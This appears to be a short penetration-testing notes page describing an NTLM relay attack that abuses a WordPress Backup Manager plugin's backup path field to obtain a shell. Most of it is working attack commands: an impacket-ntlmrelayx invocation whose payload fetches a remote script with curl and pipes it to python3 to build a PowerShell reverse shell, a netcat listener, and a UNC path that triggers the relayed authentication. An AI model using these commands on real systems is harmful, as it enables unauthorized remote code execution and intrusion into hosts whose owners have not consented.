Relay Attack Example

I found one Backup manager plugin in WordPress.

I will be abusing that.

I see that we can enter the backup path, which suggests it will authenticate the user. I will attempt a relay attack.

Step 1: Start the impacket relay server.

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.178.242 -c "$(curl -s https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py | python3 - $IP_KALI 8080)"

Step 2: Start the listener.

sudo rlwrap nc -lnvp 8080

Step 3: Enter any location in backup path and save it.

//192.168.45.187/fake_share

You will get the shell :-)

PreviousUsing SMB share to share files NextUsing Secretsdump

Last updated 1 year ago